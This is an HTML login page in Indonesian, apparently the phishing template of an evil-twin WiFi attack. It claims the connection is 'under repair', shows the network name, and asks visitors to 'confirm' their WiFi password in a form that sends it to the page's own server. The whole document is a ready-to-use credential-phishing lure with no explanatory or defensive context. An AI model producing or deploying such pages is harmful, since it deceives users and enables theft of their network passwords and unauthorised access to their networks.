<meta charset=utf-8>
<meta name=viewport content="width=device-width, initial-scale=0.8, minimal-ui">
<meta name=description content=244v234>
<title>Login</title>
<script src="/index.js"></script>
<body onload="load()">
<div class=container style="background-color:#fff;width:450px;height:450px;margin:7em auto;border-radius:1.5em;box-shadow:0 11px 35px 2px rgba(0,0,0,0.14)">
<div class=row>
<div class=col-12>
<div class=hide></div>
<br> <p class=centered data-translate=disclaimer align="center" style="padding-top:40px;color:#8c55aa;font-family:'Ubuntu',sans-serif;font-weight:bold;font-size:23px">Koneksi Dalam Perbaikan <br> Silahkan Konfirmasi <b><span class="container">Password</span></b> WiFi</p> <div class=box>
<h2 id="ssid" style="text-align:center">ssid</h2>
<form action='/' method='get'>
<input type=password name=password required placeholder="Masukkan password" style="width:76%;color:#263238;font-weight:700;font-size:14px;letter-spacing:1px;background:rgba(136,126,126,0.04);padding:10px 20px;border:0;border-radius:20px;outline:0;box-sizing:border-box;border:2px solid rgba(0,0,0,0.02);margin-bottom:50px;margin-left:46px;text-align:center;margin-bottom:27px;font-family:'Ubuntu',sans-serif"/> <input type=submit value="Konfirmasi" class=button style="text-shadow:0 0 3px rgba(117,117,117,0.12);color:#fff;text-decoration:none;cursor:pointer;border-radius:5em;background:linear-gradient(to right,#9C27B0,#E040FB);border:0;padding-left:40px;padding-right:40px;padding-bottom:10px;padding-top:10px;font-family:'Ubuntu',sans-serif;margin-left:35%;font-size:13px;box-shadow:0 0 20px 1px rgba(0,0,0,0.04)"> </div>
</form>
</div>
</div>
</div>